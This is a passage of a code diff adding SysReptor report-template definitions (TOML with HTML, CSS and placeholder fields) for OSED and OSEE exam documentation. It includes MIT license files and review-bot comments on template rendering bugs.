[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 7"
cvss = "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
id = "9e79526d-1c15-4eaa-8335-490e895053b0"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 8"
cvss = "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
id = "9fb08d0f-f4f7-469c-9423-87bc6e6b25de"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 9"
cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N"
id = "81d6959d-f7e7-4cab-a0e5-484107a4a534"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 10"
cvss = "n/a"
id = "2a5fd063-334a-4158-9ff9-a4735f556c51"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[assets]]
id = "adc2295d-5fe1-419b-a767-f277437ed91f"
name = "LICENSE"
[[assets]]
id = "e84943a8-5de0-47ac-b308-4a5854156b45"
name = "image-916547.png"
[[assets]]
id = "a31b6a77-cf79-4539-8a9a-f49f09c2f109"
name = "image-781171.png"
[[assets]]
id = "5abf3a1c-641f-4742-93bf-5763590d8b5b"
name = "image-152717.png"
[[assets]]
id = "89ea6aec-d546-43a9-9ce2-bb81e5aa6281"
name = "image-322213.png"
[[assets]]
id = "1c12c44d-11f3-4bd4-ad4f-79e6d9e5668c"
name = "image-608270.png"
[[assets]]
id = "b67b4f0a-d754-4bca-909d-376ee1751ab1"
name = "image-127195.png"
[[assets]]
id = "b42f7152-07e4-4614-9786-90a8756fcb59"
name = "image-590869.png"
[[assets]]
id = "b3e1a3b9-1c2e-4449-beb5-1282b40a03fe"
name = "image.png"
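Review bot: The sample high-level summary names the wrong host for the lateral-movement step: both the `report_fields.highlevel_summary` default and `report_preview_data.report.highlevel_summary` say the attacker moved "to the internal server APPSRV02 by reusing stolen credentials from APPSRV02" and then conclude that APPSRV03 was compromised. The target should presumably read APPSRV03, i.e. `Next the attacker performed lateral movement to the internal server APPSRV03 by reusing stolen credentials from APPSRV02, ...`, so that the demo report shows a consistent source and destination in the incident timeline. The Requirements paragraph in `report_template` also still calls this a "penetration testing report", which looks carried over from the offensive exam templates and does not fit a detection-focused OSDA report.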


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,604 @@
format = "projecttypes/v1"
id = "650eba7d-2ae4-4646-9125-fcd597af5809"
name = "OSED Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"initial_analysis",
"application_analysis",
"vulnerability_discovery",
"exploit_creation",
"screenshots",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSED Exam Documentation {.in-toc.numbered}
The Offensive Security OSED exam documentation contains all efforts that were conducted in order to pass the Offensive Security Exploit Developer exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Exploit Developer certification.
## Objective {.in-toc.numbered}
The objective of this exam is to solve three given assignments as described in the control panel. The student is tasked with following a methodical approach in analyzing and solving the assignments. The exam report is meant to be a writeup of the steps taken to solve the assignment, including any analysis performed and code written.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this exam. Use the sample report as a guideline to get you through the reporting, while removing any headlines that are not relevant to a specific assignment.
## Requirements {.in-toc .numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* High-Level summary of assignment solutions.
* Methodology walkthrough and detailed outline of steps taken through analysis and all written code.
* Each finding with included screenshots, walkthrough, sample code or reference.
* Screenshot of proof.txt.
</markdown>
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
<pagebreak />
</section>
<section>
<h1 id="findings" class="in-toc numbered">Assignments</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.initial_analysis">
<h3 class="in-toc numbered">Initial Analysis</h3>
<markdown :text="finding.initial_analysis" />
</div>
<div v-if="finding.application_analysis">
<h3 class="in-toc numbered" >Application Analysis</h3>
<markdown :text="finding.application_analysis" />
</div>
<div v-if="finding.vulnerability_discovery">
<h3 class="in-toc numbered">Vulnerability Discovery</h3>
<markdown :text="finding.vulnerability_discovery" />
</div>
<div v-if="finding.exploit_creation">
<h3 class="in-toc numbered">Exploit Creation</h3>
<markdown :text="finding.exploit_creation" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #3dc6a4;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSED Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Assignment"
origin = "core"
default = "TODO Assignment Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of proof.txt."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the proof.txt files obtained from your exam machines must be submitted in the control panel be-fore your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each proof.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using ipconfig.
"""
required = true
[finding_fields.exploit_creation]
type = "markdown"
label = "Exploit Creation"
origin = "custom"
default = "TODO Provide a description of steps to create the exploit, this includes how to combine vulnerabilities, how to bypass DEP and how to write any custom shellcode. At the end of this section the full exploit code should be developed while an explanation of each step should be performed."
required = true
[finding_fields.initial_analysis]
type = "markdown"
label = "Initial Analysis"
origin = "custom"
default = "Todo Provide relevant techniques and methods used to perform enumeration of the application, including network ports, security mitigations etc. The steps taken should be reproducible and easy to understand. Include any custom code or references to public tools."
required = true
[finding_fields.application_analysis]
type = "markdown"
label = "Application Analysis"
origin = "custom"
default = """
TODO Provide a description of the analysis performed against the application, this includes both dynamic and static analysis.
The analysis should include any reverse engineering performed to understand network protocols or file formats as well as how the application may be triggered to dispatch available commands.
"""
required = true
[finding_fields.vulnerability_discovery]
type = "markdown"
label = "Vulnerability Discovery"
origin = "custom"
default = """
TODO Provide relevant analysis steps to locate vulnerabilities inside the application, this includes both results from static analysis and dynamic analysis.
As part of the documentation, proof of concept Python3 code must be created and explained that triggers the vulnerabilities. This includes both ASLR bypass and memory corruption vulnerabilities.
Only the steps that ended up working are required.
"""
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSED Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "TODO Assignment X"
cvss = "n/a"
id = "af3d5c20-71ef-4bb2-b7af-155a5c375af1"
proof = "TODO Provide the contents of proof.txt."
screenshots = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the proof.txt files obtained from your exam machines must be submitted in the control panel be-fore your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each proof.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using ipconfig.
"""
exploit_creation = "TODO Provide a description of steps to create the exploit, this includes how to combine vulnerabilities, how to bypass DEP and how to write any custom shellcode. At the end of this section the full exploit code should be developed while an explanation of each step should be performed."
initial_analysis = "Todo Provide relevant techniques and methods used to perform enumeration of the application, including network ports, security mitigations etc. The steps taken should be reproducible and easy to understand. Include any custom code or references to public tools."
application_analysis = """
TODO Provide a description of the analysis performed against the application, this includes both dynamic and static analysis.
The analysis should include any reverse engineering performed to understand network protocols or file formats as well as how the application may be triggered to dispatch available commands.
"""
vulnerability_discovery = """
TODO Provide relevant analysis steps to locate vulnerabilities inside the application, this includes both results from static analysis and dynamic analysis.
As part of the documentation, proof of concept Python3 code must be created and explained that triggers the vulnerabilities. This includes both ASLR bypass and memory corruption vulnerabilities.
Only the steps that ended up working are required.
"""
[[assets]]
id = "eddcfd32-4595-4968-a41e-80f624bbe457"
name = "LICENSE"


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,532 @@
format = "projecttypes/v1"
id = "779cbbda-c7b1-4deb-9d21-571b3ac72f6f"
name = "OSEE Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"ropchain",
"poc",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSEE Exam Documentation {.in-toc.numbered}
The Offensive Security OSEE exam documentation contains all efforts that were conducted in order to pass the Offensive Security Exploitation Expert exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Exploitation Expert certification.
The student will be required to fill out this exam documentation fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken.
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if ap-plicable.
* Any additional items that were not included.
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-for="vulnerability in finding.vulnerabilities">
<h3 class="in-toc numbered">{{ vulnerability.reference}}</h3>
<markdown :text="vulnerability.details" />
</div>
<div v-if="finding.poc">
<h3 class="in-toc numbered" >PoC Code</h3>
<markdown :text="finding.poc" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #f1c232;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSEE Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.poc]
type = "markdown"
label = "PoC Code"
origin = "custom"
default = "TODO Provide the final proof of concept code used to gain access to the server."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of proof.txt"
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in creating the exploit. The steps taken should be able to be easily followed and reproducible if necessary. "
required = true
[finding_fields.ropchain]
type = "markdown"
label = "ROP Chain"
origin = "custom"
default = "TODO Provide the ASM ROP chains used in the exploit with a brief explanation for each gadget."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide a screenshot of the ipconfig command and the contents of proof.txt."
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSEE Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "192.168.X.X "
cvss = "n/a"
id = "a48695e2-2e6d-4f62-aa98-d3603d0c81eb"
poc = "TODO Provide the final proof of concept code used to gain access to the server."
proof = "TODO Provide the contents of proof.txt"
steps = "TODO Provide a detailed account of your methodology in creating the exploit. The steps taken should be able to be easily followed and reproducible if necessary. "
ropchain = "TODO Provide the ASM ROP chains used in the exploit with a brief explanation for each gadget."
screenshots = "TODO Provide a screenshot of the ipconfig command and the contents of proof.txt."
[[assets]]
id = "44f2c88c-11bb-45a8-a94c-95723b19529b"
name = "LICENSE"
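Review bot: The `ropchain` finding field is declared with `required = true` in `[finding_fields.ropchain]` and listed in `finding_field_order`, but `report_template` never renders it; the Findings loop instead iterates `finding.vulnerabilities` (reading `vulnerability.reference` and `vulnerability.details`), which this design does not define anywhere in `finding_fields`. As written that `v-for` presumably renders nothing, so the ROP chain entered for a finding would be missing from the rendered report. I would replace the opening lines of that block with `<div v-if="finding.ropchain">`, `<h3 class="in-toc numbered">ROP Chain</h3>` and `<markdown :text="finding.ropchain" />`, keeping the existing closing `</div>`. Separately, the bullet list in the intro markdown repeats the "Each finding with included screenshots, walkthrough, sample code, and proof.txt" item, and the second copy carries a hyphenation artifact (`ap-plicable`); the second line should be dropped.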


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,580 @@
format = "projecttypes/v1"
id = "9efe3b9d-b0df-45e0-86d9-a5bc7bcbb525"
